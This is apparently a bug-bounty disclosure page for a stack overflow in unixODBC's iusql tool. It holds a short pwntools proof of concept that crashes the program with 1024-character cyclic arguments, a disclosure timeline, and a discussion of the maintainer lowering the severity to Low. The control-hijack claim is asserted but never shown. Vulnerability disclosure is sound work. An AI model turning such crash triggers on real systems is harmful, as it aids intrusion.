classic overflow on the stack, with the ability to intercept control. in lurcher/unixodbc


Reported on

May 31st 2022


if arguments longer than 1024 were passed to program iusql, we get a classic stack overflow.

Proof of Concept

I removed the docking check to reduce POC, this check did not show overflow protection

git clone 123
sed -i 's/^.*if ( .*phEnv, phDbc ) != SQL_SUCCESS/if(0/g' 123/exe/iusql.c
import os
os.environ['PWNLIB_NOTERM'] = '1'
os.environ['JUPYTER_DETECTED'] ='yes'
from pwn import *

a = ['A']*4
a[0] = '123/exe/iusql'
a[1] = cyclic(1024)
a[2] = cyclic(1024)
a[3] = cyclic(1024)

ex = process(argv=a)
[x] Starting local process '123/exe/iusql'
[+] Starting local process '123/exe/iusql': pid 25548
[*] Switching to interactive mode
*** buffer overflow detected ***: /content/123/exe/.libs/iusql terminated


when overflowing, control is seized, and the establishment of full control over the process

We are processing your report and will contact the lurcher/unixodbc team within 24 hours. 2 years ago
ihsinme modified the report
2 years ago
ihsinme modified the report
2 years ago
ihsinme submitted a
2 years ago
We created a GitHub Issue asking the maintainers to create a 2 years ago
We have contacted a member of the lurcher/unixodbc team and are waiting to hear back a year ago
lurcher modified the Severity from High to Low a year ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
lurcher validated this vulnerability a year ago
ihsinme has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
lurcher marked this as fixed in 2.3.12pre with commit c6c547 a year ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
a year ago


how can i see why the severity is lowered. in what criteria did I make a mistake. Thanks

a year ago


good afternoon. in this report the developer fixed the level to LOW. but I can't figure out what stats it lowered. in the original rating was AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H how to see the current rating vector?

Jamie Slome
a year ago


Hello 👋 The maintainer has hard set the severity level to LOW irrespective of the vectors - i.e. they generally think that this has a low impact.

to join this conversation